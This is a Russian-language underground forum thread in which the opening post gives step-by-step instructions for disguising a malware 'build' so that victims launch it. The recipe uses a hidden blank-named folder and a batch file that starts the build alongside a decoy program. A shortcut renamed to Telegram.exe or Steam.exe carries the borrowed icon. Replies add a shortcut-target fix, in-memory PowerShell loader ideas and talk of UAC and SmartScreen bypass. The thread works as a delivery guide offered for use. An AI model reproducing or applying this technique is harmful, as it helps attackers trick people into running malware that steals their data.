Загрузка...

Сшиваем ******* с любыми программами без детектов

Тема в разделе Статьи создана пользователем ShopGuru 24 июн 2022. (поднята 12 июн 2025 в 17:05) 3940 просмотров

1. ShopGuru
    ShopGuru Автор темы 24 июн 2022 Самые низкие цены VDS - lolz.live/threads/4753594/ 423 7 май 2021
    Всем привет. Недавно увидел как InstallsLab берёт за такую услугу аж 100$ за билд ( да , вы не ослышались , за билд ) , способ легчайший , вам понадобиться компьютер / ноут ( даже если он на пентиуме , 2 гиг оперативы или windows Vista, но на ней не тестил). Всё конечно же бесплатно и даже новорег может это прочитать ( никаких хайдов! ). Итак , переходим к делу.
    ВНИМАНИЕ! ЧТО БЫ ЭТОТ СПОСОБ РАБОТАЛ, ВАМ НЕОБХОДИМО РАЗРЕШИТЬ ОТОБРАЖЕНИЕ СКРЫТЫХ ФАЙЛОВ. В ИНТЕРНЕТЕ ГАЙДОВ КАК ЭТО СДЕЛАТЬ КУЧА. Для начала, создаём любую пустую папку в удобном для вас месте. Далее в ней создаём новую папку , переключаемся на русскую раскладку клавиатуры , и жмём ALT + 0152, и после кликаем по любому свободному месту : [IMG] , мы получили папку с пустым названием. Жмём по ней ПКМ, выбираем "Свойства" , далее ставим галочку "Скрытый", [IMG] применить, после этого заходим в раздел "Настройка" [IMG] , жмём "Сменить значок", листаем чуть дальше и у нас там будут просто пустые ячейки ( я их отметил красными квадратами ) [IMG] , выбираем любой, они все одинаковые, жмём ОК, Применить и ОК.
    Вот мы создали скрытую папку , поставили на неё невидимый значок. Переходим к шагу 2.
    Заходим в нашу "Скрытую папку", закидываем туда файлы которые хотим сшить (если не хотите сшивать , то просто закидываете туда ваш билд) , создаём файл 123.txt , вписываем в него следующий код :

@ echo off (@ и echo слитно , если напишу в теме слитно - будет тэгать юзера )
    start имя_вашего_билда.exe
    start имя_дополнительной_программы.exe
    exit

Если вам не нужно сшивать , то третью строку не пишем. Если нужно склеить больше 2 файлов , добавляем после первой строки данную строку :

start вашфайл.exe

, после этого сохраняем файл. изменяем название на 123.bat , жмём по нему ПКМ и жмём создать ярлык [IMG] , после чего меняем на нём название на какое вам угодно , хоть Telegram.exe, и меняем Значок так же как в шаге 1, но если вам нужен значок конкретной программы, то нужно нажать "Обзор" [IMG] , и выбрать программу от которой вы хотите поставить значок. Далее данный ярлык переносим в основную папку (не скрытую, а в которой скрытая находится) , и готово. Файл можно назвать хоть Steam.exe, поставить ярлык стима, но когда чувак откроет этот файл, у него запустятся программы которые вы вводили в батник)
    Лучше всего создать в папке куча фейк папок, например data , settings и тд, что бы чувак не увидел вашу "скрытую папку" когда откроет ваш архив) так же желательно кидать в архив ISO , но пойдёт так же RAR и ZIP. На этом всё, надеюсь я сегодня кому то помог , или даже сэкономил кому то 100$ которые просят за 1 билд. И да , думаю после этой статьи будет куча скаммеров которые будут кидать такие файлы отрабам *****, так что внимательно чекайте расширение файла и значок ярлыка на файлах. Отстук не падает по вине склейки (максимум будут падать по причине связанной с КХ ) Спасибо за то что вы дочитали до этого момента. Всем удачи!
    Ограничение ответов в теме:
    Автор темы разрешил отвечать в теме только этим группам (и вышестоящим): Команда форума и Кураторы.

Этот материал оказался полезным?
    Вы можете отблагодарить автора темы путем перевода средств на баланс
    Отблагодарить автора
    24 июн 2022 Изменено
  2. supaplaya
    supaplaya 24 июн 2022 Купил подороже продал подешевле 126 1 мар 2019
    Эта статья оказалось полезной! Благодарность автору

1. ShopGuru Автор темы
      supaplaya, не понимаю за что брать 100$ ЗА БИЛД, когда тут всё и так легко, я даже не покупал что бы понять как это работает)
    2. darkside
      ShopGuru, ну мб он использует другой какой-то способ, но все равно 100$ за билд это ппц
    3. ShopGuru Автор темы
      darkside, он похож в любом случае, можно ещё долго мудрить , например изменить размер запускаемого бат файла, но я рассказал про самый лёгкий на мой взгляд
  3. darkside
    darkside 24 июн 2022 :omg: гость ➤ :omg: 2800 22 дек 2019
    А почему частичный обход?

4. AiOhto
    AiOhto 24 июн 2022 814 12 янв 2022
    Статья полезная, но там немного работает по другому а именно как лоадер, ярлык запускает powershell который уже выполняет там код. похожий на этот а именно лоадер который запускает байты в памяти (наверное хз) https://stackoverflow.com/questions/68977280/executing-executables-in-memory-with-powershell

5. InstallsLab
    InstallsLab 24 июн 2022 6954 18 фев 2022
    ну ты покажи как он юак и смарт байпассит хотя б (не байпассит поэтому нету скринов)

24 июн 2022 Изменено
    1. Посмотреть предыдущие комментарии (5)
    2. ShopGuru Автор темы
      iamusik, писать научись)
  6. Ethereum_CIassic
    Пытаюсь переименовать папку и ничего не выходит
    [IMG] :peperain:

24 июн 2022 Изменено
    1. Посмотреть предыдущие комментарии (1)
    2. Ethereum_CIassic
      ShopGuru, я и так на нём)Просто ничего не просходит и всё
  7. Psychotic
    Psychotic 24 июн 2022 Заблокирован(а) 1615 14 янв 2022
    способ ахуенен! Но некоторых пользователей отталкивают скрытые папки (когда они отображаются)

1. Ethereum_CIassic
      Psychotic, туда можно тоже левых файлов накидать изменить название билда и всё
  8. Hardknock
    Hardknock 26 июн 2022 53 8 фев 2017
    Только ты забыл указать, чтобы ярлык работал на другом пк , нужно указать в свойствах самого ярлыка объект: %windir%\explorer.exe ".\ \123.bat" , а поле рабочая папка: всё удалить и оставить пустым

9. iamusik
    iamusik 1 июл 2022 360 7 июл 2020
    ничего из заявленного не должно и не будет обходить
    по поводу склейки: не назвал бы это таковой. Склейка - совмещение 2+ файлов в 1, здесь мы видим как минимум 3

1. ShopGuru Автор темы
      iamusik, Будет, и должно, ибо файл не докачивается, а уже скачан. Склейка , так уж и быть как пишет InstallsLab "эксполойт"
    2. iamusik
      ShopGuru,
      Перепроверь SmartScreen с файлом, скаченным из интернета.
      UAC 100% не будет обходить (для проверки этого тебе достаточно запустить файл с правами администратора этим методом(не позорься), Проверяй инфу
    3. ShopGuru Автор темы
      iamusik, чувак , у меня всё работает , и я не ебу что у тебя там
Загрузка...